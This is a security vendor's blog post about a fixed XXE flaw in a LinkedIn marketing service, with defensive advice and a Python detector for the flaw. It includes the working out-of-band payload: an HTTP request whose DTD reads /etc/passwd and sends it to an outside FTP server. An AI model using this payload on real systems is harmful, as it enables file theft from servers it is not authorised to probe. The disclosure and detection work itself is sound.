With all the time and resources we allocate to finding application vulnerabilities, it’s easy to forget that third-party libraries and software can introduce vulnerabilities into our applications as well. Attackers know this and try to exploit them.
In this blog post we will illustrate a vulnerability found within one of the LinkedIn services. The security issue was discovered in December 2015 and was fixed within 24 hours by the LinkedIn team.
What is XXE
OWASP says: "An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser."
So an XXE vulnerability is not truly a developer mistake but more of a misconfiguration of the XML parser.
The impact of XXE vulnerabilities is severe. They allow an attacker to read local files on remote servers, send requests into internal networks, and in some cases even execute code remotely.
XXE in an application server
An even more complicated situation is where the vulnerability is introduced not in your code, but in the web server or application server you use.
A good example is an old vulnerability in the Apache CXF SOAP server. The Apache CXF library initialized its XML parser unsafely, and developers using the library had no way to see how the parser was initialized. As a quick fix, the Apache CXF maintainers proposed that developers redefine the XML parser in a safe way themselves. In that case this was possible, but what if such a vulnerability sits in the code of the web server itself?
This is exactly the case with the critical LinkedIn service vulnerability discovered by Wallarm security researcher, Anton Lopanitsyn.
Vulnerability in LinkedIn
LinkedIn Marketing Solutions is a B2B product for marketing within the social network. After a simple check, it turned out that the web server parses every XML document passed in HTTPS requests. Parsing happens even before control passes to the web application itself, so it was functionality of the application server.
As a result, it was possible to send XML documents to any URL on the web server, which could result in the XXE vulnerability being exploited. This is an example of a request to the root page which allowed reading the local file /etc/motd:
POST / HTTP/1.1
Content-type: blabla/xml
Host: signin.lms.linkedin.com
Content-Length: 204
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Wallarm-bot
Accept: */*

<?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY % b SYSTEM "file:///etc/passwd">
<!ENTITY % asd SYSTEM "http://wallarm.tools/xxe.dtd">
%asd;
%rrr;
]>
<a>123</a>
The content of xxe.dtd:
<!ENTITY % c '<!ENTITY % rrr SYSTEM "ftp://email@example.com:8021/%b;">'>%c;
In the XML file, a special OOB (out-of-band) technique was used for reading the file content and transmitting it to the FTP server. You can get more details on this technique in this article.
Wallarm reported this vulnerability to the LinkedIn Security Team on December 12th and received an initial response within two minutes. The vulnerability was fixed within a 24-hour turnaround.
Protection against XXE
Obviously, organizations cannot do much if a vulnerability occurs in third-party libraries or in the application server. In this case, you need to use a WAF (Web Application Firewall) which analyzes all HTTP requests and blocks those carrying malicious payloads.
However, there is one complication: a WAF needs full support for parsing XML documents to provide actual protection against XXE vulnerabilities. It may seem that an organization just needs a few regular expressions to analyze requests. However, XML documents can be transmitted in a different encoding, e.g. UTF-16, and attempts to mitigate with regular expressions will then fail.
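To illustrate that encoding point, here is an added example (written for this post, not Wallarm's or LinkedIn's code) that runs a byte-level "grep for DOCTYPE" rule and an XML-aware check over a UTF-8 and a UTF-16 copy of the parameter-entity payload shown above; the DTD host in the sample is a placeholder.

```python
import re

# Constructed sample body modelled on the parameter-entity payload in the post;
# the DTD host is a placeholder, not the one used in the original report.
SAMPLE_BODY = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE a [\n'
    '  <!ENTITY % b SYSTEM "file:///etc/passwd">\n'
    '  <!ENTITY % asd SYSTEM "http://dtd-host.invalid/xxe.dtd">\n'
    '  %asd; %rrr;\n'
    ']>\n'
    '<a>123</a>\n'
)

DOCTYPE_RE = re.compile(r'<!DOCTYPE\b')
# Entity declared with an external identifier; group 1 is set for parameter (%) entities.
EXTERNAL_ENTITY_RE = re.compile(r'<!ENTITY\s+(%\s*)?[\w.:-]+\s+(SYSTEM|PUBLIC)\b')
XML_DECL_RE = re.compile(rb"(?:\xef\xbb\xbf)?<\?xml[^>]*encoding=[\"']([A-Za-z0-9._-]+)[\"']")


def naive_regex_check(body: bytes) -> bool:
    """Byte-level 'grep for DOCTYPE': the kind of rule the post says is insufficient."""
    return re.search(rb'<!DOCTYPE', body) is not None


def sniff_encoding(body: bytes) -> str:
    """Guess the encoding the way an XML parser does: BOM first, then the byte
    pattern of '<?', then the encoding pseudo-attribute; UTF-8 otherwise."""
    if body.startswith(b'\xff\xfe') or body.startswith(b'<\x00?\x00'):
        return 'utf-16-le'
    if body.startswith(b'\xfe\xff') or body.startswith(b'\x00<\x00?'):
        return 'utf-16-be'
    m = XML_DECL_RE.match(body)
    return m.group(1).decode('ascii') if m else 'utf-8'


def xxe_indicators(body: bytes) -> list:
    """Decode first, then inspect the DTD: this is what XML-aware inspection means."""
    text = body.decode(sniff_encoding(body), errors='replace')
    findings = []
    if DOCTYPE_RE.search(text):
        findings.append('DOCTYPE declaration present')
    for m in EXTERNAL_ENTITY_RE.finditer(text):
        kind = 'parameter' if m.group(1) else 'general'
        findings.append(f'external {kind} entity ({m.group(2)})')
    return findings


def is_xxe_attempt(body: bytes) -> bool:
    """Block rule: any DOCTYPE that declares an external (SYSTEM/PUBLIC) entity."""
    return any(f.startswith('external') for f in xxe_indicators(body))
```

The byte-level rule matches the UTF-8 body but misses the same document encoded as UTF-16, while the decode-then-inspect check flags both; the real fix remains disabling DOCTYPE and external entity resolution in the parser itself.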
Wallarm parses all the XML content to detect XXE attacks. Furthermore, Wallarm can discover XXE vulnerabilities with a built-in fuzzer. You can try it now for free at https://wallarm.com.
PS Be aware that LinkedIn does not have a public bug bounty program!